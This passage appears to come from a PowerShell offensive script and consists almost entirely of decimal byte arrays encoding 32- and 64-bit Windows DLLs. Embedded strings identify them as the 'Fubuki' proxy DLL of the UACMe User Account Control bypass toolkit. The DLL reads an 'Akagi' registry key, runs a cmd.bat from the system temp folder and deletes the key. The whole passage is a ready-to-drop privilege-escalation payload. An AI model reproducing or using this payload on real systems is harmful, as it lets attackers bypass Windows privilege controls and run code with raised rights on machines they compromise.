67 1 0 0 72 139 77 111 72 133 201 15 132 54 1 0 0 72 141 69 103 69 51 201 72 137 68 36 40 72 141 21 49 16 0 0 72 33 116 36 32 69 51 192 255 21 147 15 0 0 133 192 15 133 13 1 0 0 139 125 103 255 199 255 21 208 15 0 0 68 139 199 141 86 8 72 139 200 255 21 137 15 0 0 72 139 216 72 133 192 15 132 231 0 0 0 72 139 77 111 72 141 69 103 72 137 68 36 40 72 141 21 225 15 0 0 69 51 201 72 137 92 36 32 69 51 192 255 21 64 15 0 0 133 192 15 133 136 0 0 0 72 141 13 217 15 0 0 255 21 99 15 0 0 72 139 203 255 21 90 15 0 0 141 86 104 51 192 139 202 72 141 125 215 243 170 72 141 125 183 137 85 215 141 78 24 243 170 72 141 77 215 255 21 87 15 0 0 72 141 69 183 69 51 201 72 137 68 36 72 69 51 192 72 141 69 215 72 139 211 72 137 68 36 64 51 201 72 33 116 36 56 72 33 116 36 48 33 116 36 40 33 116 36 32 255 21 250 14 0 0 139 240 133 192 116 20 72 139 77 183 255 21 226 14 0 0 72 139 77 191 255 21 216 14 0 0 255 21 250 14 0 0 76 139 195 51 210 72 139 200 255 21 228 14 0 0 72 139 77 111 255 21 154 14 0 0 72 141 21 251 14 0 0 72 199 193 1 0 0 128 255 21 110 14 0 0 139 198 72 139 156 36 16 1 0 0 72 129 196 224 0 0 0 95 94 93 195 204 72 137 92 36 8 72 137 124 36 16 85 72 141 172 36 0 250 255 255 72 129 236 0 7 0 0 184 1 0 0 0 59 208 15 133 80 1 0 0 72 141 13 10 15 0 0 255 21 108 14 0 0 232 35 254 255 255 51 219 133 192 15 133 43 1 0 0 141 83 104 139 202 72 141 124 36 112 243 170 72 141 124 36 80 137 84 36 112 141 75 24 243 170 72 141 76 36 112 255 21 88 14 0 0 51 192 72 141 125 224 185 10 2 0 0 72 141 85 224 243 170 72 141 13 240 14 0 0 65 184 4 1 0 0 255 21 28 14 0 0 255 200 61 2 1 0 0 15 135 213 0 0 0 51 192 72 141 189 240 1 0 0 185 16 4 0 0 243 170 15 183 77 224 72 141 133 240 1 0 0 102 133 201 116 30 72 141 85 224 72 141 189 240 1 0 0 72 43 215 102 137 8 72 131 192 2 15 183 12 2 102 133 201 117 240 102 137 24 72 141 133 240 1 0 0 102 57 157 240 1 0 0 116 9 72 131 192 2 102 57 24 117 247 72 141 13 158 14 0 0 186 99 0 0 0 72 43 200 102 137 16 72 141 64 2 15 183 20 1 102 133 210 117 240 102 137 24 72 141 141 240 1 0 0 72 141 68 36 80 69 51 201 72 137 68 36 72 69 51 192 72 141 68 36 112 51 210 72 137 68 36 64 72 141 69 224 72 137 68 36 56 72 137 92 36 48 137 92 36 40 137 92 36 32 255 21 68 13 0 0 133 192 116 22 72 139 76 36 80 255 21 45 13 0 0 72 139 76 36 88 255 21 34 13 0 0 51 201 255 21 18 13 0 0 204 76 141 156 36 0 7 0 0 73 139 91 16 73 139 123 24 73 139 227 93 195 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 39 0 0 0 0 0 0 182 39 0 0 0 0 0 0 162 39 0 0 0 0 0 0 214 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 86 39 0 0 0 0 0 0 98 39 0 0 0 0 0 0 72 39 0 0 0 0 0 0 130 39 0 0 0 0 0 0 50 39 0 0 0 0 0 0 22 39 0 0 0 0 0 0 10 39 0 0 0 0 0 0 112 39 0 0 0 0 0 0 248 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 83 0 111 0 102 0 116 0 119 0 97 0 114 0 101 0 92 0 65 0 107 0 97 0 103 0 105 0 0 0 0 0 76 0 111 0 118 0 101 0 76 0 101 0 116 0 116 0 101 0 114 0 0 0 0 0 65 0 107 0 97 0 103 0 105 0 32 0 108 0 101 0 116 0 116 0 101 0 114 0 32 0 102 0 111 0 117 0 110 0 100 0 0 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 32 0 97 0 116 0 32 0 121 0 111 0 117 0 114 0 32 0 115 0 101 0 114 0 118 0 105 0 99 0 101 0 46 0 13 0 10 0 0 0 0 0 0 0 37 0 115 0 121 0 115 0 116 0 101 0 109 0 114 0 111 0 111 0 116 0 37 0 92 0 116 0 101 0 109 0 112 0 92 0 0 0 0 0 99 0 109 0 100 0 46 0 98 0 97 0 116 0 0 0 0 0 0 0 250 130 9 86 0 0 0 0 13 0 0 0 252 0 0 0 136 33 0 0 136 9 0 0 0 0 0 0 250 130 9 86 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 71 67 84 76 0 16 0 0 52 3 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 120 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 128 32 0 0 8 1 0 0 46 114 100 97 116 97 0 0 136 33 0 0 252 0 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 132 34 0 0 40 0 0 0 46 120 100 97 116 97 0 0 176 34 0 0 148 3 0 0 46 101 100 97 116 97 0 0 68 38 0 0 40 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 108 38 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 128 38 0 0 120 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 248 38 0 0 250 0 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 24 0 0 0 46 112 100 97 116 97 0 0 0 64 0 0 160 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 160 64 0 0 64 4 0 0 46 114 115 114 99 36 48 50 0 0 0 0 1 20 7 0 20 52 34 0 20 1 28 0 8 112 7 96 6 80 0 0 1 26 7 0 26 116 227 0 26 52 226 0 26 1 224 0 11 80 0 0 0 0 0 0 0 0 0 0 250 130 9 86 0 0 0 0 240 35 0 0 1 0 0 0 28 0 0 0 28 0 0 0 216 34 0 0 72 35 0 0 184 35 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 253 35 0 0 20 36 0 0 42 36 0 0 52 36 0 0 62 36 0 0 89 36 0 0 117 36 0 0 144 36 0 0 163 36 0 0 184 36 0 0 202 36 0 0 222 36 0 0 243 36 0 0 15 37 0 0 34 37 0 0 58 37 0 0 77 37 0 0 104 37 0 0 124 37 0 0 145 37 0 0 172 37 0 0 198 37 0 0 210 37 0 0 232 37 0 0 246 37 0 0 17 38 0 0 35 38 0 0 55 38 0 0 0 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 8 0 9 0 10 0 11 0 12 0 13 0 14 0 15 0 16 0 17 0 18 0 19 0 20 0 21 0 22 0 23 0 24 0 25 0 26 0 27 0 70 117 98 117 107 105 54 52 46 100 108 108 0 67 97 108 108 78 116 80 111 119 101 114 73 110 102 111 114 109 97 116 105 111 110 0 67 111 110 115 116 114 117 99 116 80 97 114 116 105 97 108 77 115 103 86 87 0 67 114 101 97 116 101 85 114 105 0 67 117 114 114 101 110 116 73 80 0 68 101 118 79 98 106 67 114 101 97 116 101 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 68 101 115 116 114 111 121 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 69 110 117 109 68 101 118 105 99 101 73 110 116 101 114 102 97 99 101 115 0 68 101 118 79 98 106 71 101 116 67 108 97 115 115 68 101 118 115 0 68 101 118 79 98 106 79 112 101 110 68 101 118 105 99 101 73 110 102 111 0 68 108 108 82 101 103 105 115 116 101 114 83 101 114 118 101 114 0 71 101 110 101 114 97 116 101 65 99 116 105 111 110 81 117 101 117 101 0 80 111 119 101 114 71 101 116 65 99 116 105 118 101 83 99 104 101 109 101 0 80 114 105 118 97 116 101 67 111 73 110 116 101 114 110 101 116 67 111 109 98 105 110 101 85 114 105 0 80 114 111 99 101 115 115 65 99 116 105 111 110 81 117 101 117 101 0 83 76 71 101 116 87 105 110 100 111 119 115 73 110 102 111 114 109 97 116 105 111 110 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 69 110 117 109 0 87 100 115 67 114 101 97 116 101 66 108 97 99 107 98 111 97 114 100 0 87 100 115 68 101 115 116 114 111 121 66 108 97 99 107 98 111 97 114 100 0 87 100 115 69 110 117 109 70 105 114 115 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 69 110 117 109 78 101 120 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 70 114 101 101 68 97 116 97 0 87 100 115 71 101 116 66 108 97 99 107 98 111 97 114 100 86 97 108 117 101 0 87 100 115 73 110 105 116 105 97 108 105 122 101 0 87 100 115 73 115 68 105 97 103 110 111 115 116 105 99 77 111 100 101 69 110 97 98 108 101 100 0 87 100 115 83 101 116 65 115 115 101 114 116 70 108 97 103 115 0 87 100 115 83 101 116 117 112 76 111 103 77 101 115 115 97 103 101 87 0 87 100 115 84 101 114 109 105 110 97 116 101 0 168 38 0 0 0 0 0 0 0 0 0 0 148 39 0 0 40 32 0 0 128 38 0 0 0 0 0 0 0 0 0 0 228 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 39 0 0 0 0 0 0 182 39 0 0 0 0 0 0 162 39 0 0 0 0 0 0 214 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 86 39 0 0 0 0 0 0 98 39 0 0 0 0 0 0 72 39 0 0 0 0 0 0 130 39 0 0 0 0 0 0 50 39 0 0 0 0 0 0 22 39 0 0 0 0 0 0 10 39 0 0 0 0 0 0 112 39 0 0 0 0 0 0 248 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 197 2 71 101 116 83 116 97 114 116 117 112 73 110 102 111 87 0 60 3 72 101 97 112 70 114 101 101 0 0 91 1 69 120 112 97 110 100 69 110 118 105 114 111 110 109 101 110 116 83 116 114 105 110 103 115 87 0 253 3 79 117 116 112 117 116 68 101 98 117 103 83 116 114 105 110 103 87 0 0 127 0 67 108 111 115 101 72 97 110 100 108 101 0 56 3 72 101 97 112 65 108 108 111 99 0 87 1 69 120 105 116 80 114 111 99 101 115 115 0 169 2 71 101 116 80 114 111 99 101 115 115 72 101 97 112 0 0 219 0 67 114 101 97 116 101 80 114 111 99 101 115 115 87 0 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 146 2 82 101 103 81 117 101 114 121 86 97 108 117 101 69 120 87 0 0 133 2 82 101 103 79 112 101 110 75 101 121 69 120 87 0 104 2 82 101 103 68 101 108 101 116 101 75 101 121 87 0 84 2 82 101 103 67 108 111 115 101 75 101 121 0 65 68 86 65 80 73 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 16 0 0 167 17 0 0 132 34 0 0 168 17 0 0 52 19 0 0 152 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 16 0 0 0 32 0 0 128 24 0 0 0 56 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 80 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 104 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 144 0 0 0 160 64 0 0 192 2 0 0 0 0 0 0 0 0 0 0 96 67 0 0 125 1 0 0 0 0 0 0 0 0 0 0 192 2 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0 83 0 73 0 79 0 78 0 95 0 73 0 78 0 70 0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 9 0 1 0 0 0 0 0 9 0 1 0 0 0 0 0 63 0 0 0 0 0 0 0 0 0 4 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 2 0 0 1 0 83 0 116 0 114 0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 252 1 0 0 1 0 48 0 52 0 48 0 57 0 48 0 52 0 98 0 48 0 0 0 50 0 9 0 1 0 67 0 111 0 109 0 112 0 97 0 110 0 121 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 0 0 72 0 16 0 1 0 70 0 105 0 108 0 101 0 68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105 0 111 0 110 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 32 0 112 0 114 0 111 0 120 0 121 0 32 0 68 0 76 0 76 0 0 0 48 0 8 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 46 0 7 0 1 0 73 0 110 0 116 0 101 0 114 0 110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 0 0 0 0 104 0 34 0 1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 0 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 32 0 40 0 67 0 41 0 32 0 50 0 48 0 49 0 52 0 32 0 45 0 50 0 48 0 49 0 53 0 32 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 62 0 11 0 1 0 79 0 114 0 105 0 103 0 105 0 110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 46 0 100 0 108 0 108 0 0 0 0 0 44 0 6 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 0 0 52 0 8 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 68 0 0 0 1 0 86 0 97 0 114 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36 0 4 0 0 0 84 0 114 0 97 0 110 0 115 0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 9 4 176 4 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0",
6774
6775 [Parameter(Position = 6, Mandatory = $False)]
6776 [String]
6777 $DllBytes32 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 4 0 4 49 10 86 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 4 0 0 0 16 0 0 0 0 0 0 46 17 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 162 232 0 0 2 0 64 5 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 80 33 0 0 148 3 0 0 192 37 0 0 60 0 0 0 0 48 0 0 224 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 60 0 0 0 16 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 137 2 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 50 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 48 0 0 0 6 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 60 0 0 0 0 64 0 0 0 2 0 0 0 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 195 85 139 236 131 236 92 83 87 141 69 252 51 219 80 104 25 0 2 0 83 104 64 32 0 16 104 1 0 0 128 139 251 137 93 252 137 93 248 255 21 4 32 0 16 133 192 15 133 241 0 0 0 57 93 252 15 132 232 0 0 0 86 139 53 8 32 0 16 141 69 248 80 83 83 83 104 96 32 0 16 255 117 252 255 214 133 192 15 133 199 0 0 0 139 69 248 64 80 106 8 255 21 48 32 0 16 80 255 21 20 32 0 16 139 216 133 219 15 132 169 0 0 0 141 69 248 80 83 87 87 104 96 32 0 16 255 117 252 255 214 133 192 117 107 139 53 36 32 0 16 104 120 32 0 16 255 214 83 255 214 106 68 90 139 202 141 69 164 198 0 0 64 131 233 1 117 247 106 16 89 141 69 232 198 0 0 64 131 233 1 117 247 141 69 164 137 85 164 80 255 21 52 32 0 16 141 69 232 80 141 69 164 80 51 192 80 80 80 80 80 80 83 80 255 21 32 32 0 16 139 248 133 255 116 16 255 117 232 139 53 28 32 0 16 255 214 255 117 236 255 214 83 106 0 255 21 48 32 0 16 80 255 21 44 32 0 16 255 117 252 255 21 12 32 0 16 104 64 32 0 16 104 1 0 0 128 255 21 0 32 0 16 94 139 199 95 91 139 229 93 195 85 139 236 129 236 112 6 0 0 51 192 64 83 86 57 69 12 15 133 60 1 0 0 104 160 32 0 16 255 21 36 32 0 16 232 172 254 255 255 51 219 133 192 15 133 27 1 0 0 106 68 90 139 202 141 69 172 136 24 64 131 233 1 117 248 106 16 89 141 69 240 136 24 64 131 233 1 117 248 141 69 172 137 85 172 80 255 21 52 32 0 16 185 10 2 0 0 141 133 160 253 255 255 136 24 64 131 233 1 117 248 190 4 1 0 0 141 133 160 253 255 255 86 80 104 212 32 0 16 255 21 40 32 0 16 133 192 15 132 189 0 0 0 59 198 15 131 181 0 0 0 185 16 4 0 0 141 133 144 249 255 255 136 24 64 131 233 1 117 248 102 139 133 160 253 255 255 141 141 144 249 255 255 102 133 192 116 30 15 183 240 141 149 160 253 255 255 139 193 43 208 102 137 49 131 193 2 15 183 4 10 139 240 102 133 192 117 239 51 192 102 137 1 141 141 144 249 255 255 102 57 133 144 249 255 255 116 8 131 193 2 102 57 25 117 248 106 99 186 252 32 0 16 94 43 209 102 137 49 141 73 2 15 183 4 10 139 240 102 133 192 117 239 51 192 102 137 1 141 69 240 80 141 69 172 80 141 133 160 253 255 255 80 83 83 83 83 83 83 141 133 144 249 255 255 80 255 21 32 32 0 16 133 192 116 16 255 117 240 139 53 28 32 0 16 255 214 255 117 244 255 214 83 255 21 24 32 0 16 94 91 139 229 93 194 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6 39 0 0 246 38 0 0 226 38 0 0 22 39 0 0 0 0 0 0 150 38 0 0 162 38 0 0 136 38 0 0 194 38 0 0 114 38 0 0 86 38 0 0 74 38 0 0 176 38 0 0 56 38 0 0 0 0 0 0 0 0 0 0 83 0 111 0 102 0 116 0 119 0 97 0 114 0 101 0 92 0 65 0 107 0 97 0 103 0 105 0 0 0 0 0 76 0 111 0 118 0 101 0 76 0 101 0 116 0 116 0 101 0 114 0 0 0 0 0 65 0 107 0 97 0 103 0 105 0 32 0 108 0 101 0 116 0 116 0 101 0 114 0 32 0 102 0 111 0 117 0 110 0 100 0 0 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 32 0 97 0 116 0 32 0 121 0 111 0 117 0 114 0 32 0 115 0 101 0 114 0 118 0 105 0 99 0 101 0 46 0 13 0 10 0 0 0 37 0 115 0 121 0 115 0 116 0 101 0 109 0 114 0 111 0 111 0 116 0 37 0 92 0 116 0 101 0 109 0 112 0 92 0 0 0 0 0 99 0 109 0 100 0 46 0 98 0 97 0 116 0 0 0 0 0 0 0 0 0 0 0 4 49 10 86 0 0 0 0 13 0 0 0 220 0 0 0 228 36 0 0 228 12 0 0 0 0 0 0 4 49 10 86 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 49 10 86 0 0 0 0 144 34 0 0 1 0 0 0 28 0 0 0 28 0 0 0 120 33 0 0 232 33 0 0 88 34 0 0 0 16 0 0 0 16 